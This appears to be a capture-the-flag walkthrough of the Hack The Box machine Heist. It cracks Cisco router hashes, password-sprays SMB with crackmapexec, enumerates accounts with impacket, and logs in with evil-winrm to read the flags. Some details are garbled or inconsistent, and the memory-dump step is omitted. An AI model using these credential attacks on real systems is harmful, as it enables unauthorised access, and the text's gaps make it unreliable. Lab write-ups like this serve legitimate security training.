Heist brought new concepts that I had never seen before on HTB, while still maintaining a simple difficulty level. I will start by finding a Cisco configuration on the website that contains some usernames and password hashes. After recovering the passwords, I will discover one that can obtain RPC access, which I will use to find more usernames. One of these usernames and one of the original passwords are used to obtain a WinRM session on Heist. From there, I will notice that Firefox is running and dump the process memory to find the original website's password, which is also the administrator password for the box.
Information Gathering#
└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds
Ports 80 and 445 are open, let's check port 80.
This page is a login page, I tried weak passwords with no success and found an option to log in as a guest.
Password Cracking#
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
I obtained a Cisco network configuration file.
Among them:
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
These are the passwords for two accounts:
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
This looks like a credential for a security key.
CMD5 could not crack the password, I retrieved a Cisco password cracker and found an online cracking webpage.
The URL is: https://www.ifm.net.nz/cookbooks/passwordcracker.html
I obtained the password for user rout3r as $uperP_@_ssword and the admin password as Q4)sJu\Y8qz*A3?d.
Now I still need to crack a password for the security key type.
Using John to automatically crack the ciphertext:
─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent (?)
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I obtained another password, stealth1agent.
Now I have two accounts and three passwords:
User
rout3r
admin
Password
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
Lateral Movement on Port 445#
With these passwords, and since port 445 is also open, I will directly try crackmapexec for lateral movement.
It was quite embarrassing that none of the accounts were able to be cracked. I looked back at the web and added the guest account Hazard to the list.
Let's run it again.
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard
I obtained an SMB account, Hazard.
Based on previous experience, it is also possible to lateral move via winRM, so I will scan port 5985.
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT STATE SERVICE
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
I tried to connect using that password, but found I couldn't connect.
Let's check the SMB shares.
smbmap -H 10.10.10.149 -u hazard -p stealth1agent
─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445 Name: 10.129.96.157
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
I found I could connect to IPC with read-only permissions.
SMB User Enumeration#
https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html This article provides a detailed introduction to several uses of the impacket package.
└─# python3 lookupsid.py hazard:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
After obtaining these new users, I will go back and supplement the initial users and try to crack them again.
└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB 10.129.96.157 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard:stealth1agent
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB 10.129.96.157 445 SUPPORTDESK [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE
The --continue-on-success parameter allows crackmapexec to continue running instead of stopping after one attempt. I enumerated a new user, SupportDesk\Chase)sJu\Y8qz*A3?d.
winRM Connection#
┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>
The new user chase is able to connect.
Obtain User Flag#
Evil-Win-WM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-Win-WM* PS C:\Users\Chase\desktop> dir
Directory: C:\Users\Chase\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/22/2019 9:08 AM 121 todo.txt
-ar--- 12/9/2022 7:41 AM 34 user.txt
*Evil-Win-WM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-Win-WM* PS C:\Users\Chase\desktop>
Obtain Root Flag#
I found that there are many users on the current computer, but I cannot read others' desktops due to low permissions.
Let's check the todo.txt file I just found.
*Evil-Win-WM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
It suggests three tasks:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.
Let's check the processes.
*Evil-Win-WM* PS C:\Users\Chase\desktop> ps
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
468 18 1980 5272 368 0 csrss
290 13 2224 5104 472 1 csrss
357 15 3448 14572 2156 1 ctfmon
251 14 3920 13316 3916 0 dllhost
166 9 1880 9716 0.03 6616 1 dllhost
614 32 29164 57988 960 1 dwm
1498 58 23896 78852 5304 1 explorer
1090 68 128468 205616 5.72 6264 1 firefox
347 19 10144 38584 0.11 6444 1 firefox
355 25 16396 38876 0.06 6716 1 firefox
401 34 34604 92436 0.70 6840 1 firefox
378 28 22020 58668 0.70 7020 1 firefox
49 6 1792 4584 768 1 fontdrvhost
49 6 1492 3808 776 0 fontdrvhost
0 0 56 8 0 0 Idle
976 22 5800 14792 624 0 lsass
223 13 3072 10308 3220 0 msdtc
0 12 400 15056 88 0 Registry
275 14 3096 15000 5448 1 RuntimeBroker
145 9 1716 7524 5732 1 RuntimeBroker
303 16 5636 17024 5804 1 RuntimeBroker
663 32 19716 61648 5668 1 SearchUI
550 11 5192 9632 608 0 services
672 28 14788 51860 5576 1 ShellExperienceHost
440 17 4792 23976 5032 1 sihost
53 3 528 1100 268 0 smss
471 22 5812 16264 2460 0 spoolsv
201 12 1980 9592 332 0 svchost
150 9 1812 11648 700 0 svchost
85 5 928 3716 724 0 svchost
860 20 6944 22496 744 0 svchost
378 13 10684 14832 852 0 svchost
868 16 5288 11672 856 0 svchost
257 10 2016 7648 908 0 svchost
286 13 4148 11276 1020 0 svchost
140 7 1364 5620 1068 0 svchost
126 16 4016 7832 1188 0 svchost
184 9 1796 7440 1200 0 svchost
229 12 2628 11208 1216 0 svchost
430 9 2808 8828 1236 0 svchost
154 7 1256 5540 1264 0 svchost
231 9 2168 7512 1304 0 svchost
367 17 4904 13864 1380 0 svchost
172 10 1792 8012 1392 0 svchost
353 14 4380 11480 1440 0 svchost
163 9 3084 7628 1452 0 svchost
255 15 3520 8512 1484 0 svchost
305 11 1976 8740 1492 0 svchost
191 12 2144 11888 1624 0 svchost
320 10 2552 8328 1640 0 svchost
163 11 2868 7356 1716 0 svchost
161 8 1896 7052 1772 0 svchost
129 7 1564 6216 1784 0 svchost
409 32 8448 17000 1820 0 svchost
196 11 1976 8040 1880 0 svchost
239 11 2516 9604 1888 0 svchost
171 9 1532 7176 2120 0 svchost
332 18 14656 31224 2124 0 svchost
167 12 4032 10820 2504 0 svchost
181 22 2488 9796 2512 0 svchost
462 20 12112 26688 2524 0 svchost
261 13 2668 7892 2540 0 svchost
376 15 9708 19304 2564 0 svchost
133 9 1672 6484 2604 0 svchost
136 8 1560 6096 2632 0 svchost
126 7 1224 5264 2656 0 svchost
205 11 2288 8296 2676 0 svchost
233 14 4604 11740 2752 0 svchost
169 10 2204 13200 2816 0 svchost
209 12 1852 7416 2824 0 svchost
265 19 3208 12000 2864 0 svchost
464 17 3448 11820 3076 0 svchost
193 15 6076 10004 3144 0 svchost
382 23 3340 12184 3248 0 svchost
423 48 13668 22296 3256 0 svchost
211 11 2780 11836 4432 0 svchost
145 8 1680 7432 4640 0 svchost
187 12 2636 13236 4696 0 svchost
169 9 4792 12192 4868 0 svchost
300 15 12772 14740 4928 0 svchost
251 14 3188 13740 4940 0 svchost
228 12 3100 13560 5048 1 svchost
365 18 5720 27008 5080 1 svchost
122 7 1288 5520 6208 0 svchost
115 7 1328 5192 6404 0 svchost
264 14 3632 12648 6488 0 svchost
225 12 3624 10940 6572 0 svchost
321 20 10184 14620 6756 0 svchost
1891 0 192 136 4 0 System
211 20 3976 12372 2036 1 taskhostw
167 11 2788 10760 2720 0 VGAuthService
142 8 1696 6844 2692 0 vm3dservice
136 9 1820 7352 3056 1 vm3dservice
384 22 9616 22104 2708 0 vmtoolsd
236 18 5096 15288 5712 1 vmtoolsd
171 11 1500 6860 492 0 wininit
280 13 2816 12936 528 1 winlogon
344 16 8920 18660 3196 0 WmiPrvSE
812 27 52104 70388 1.78 4316 0 wsmprovhost
I found that all the processes are normal, but one Firefox process seems very out of place. Following the penetration testing mindset, I will try to check the browser configuration...
└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-Win-WM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-Win-WM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-Win-WM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-Win-WM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/9/2022 7:41 AM 34 root.txt
*Evil-Win-WM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-Win-WM* PS C:\Users\Administrator\Desktop>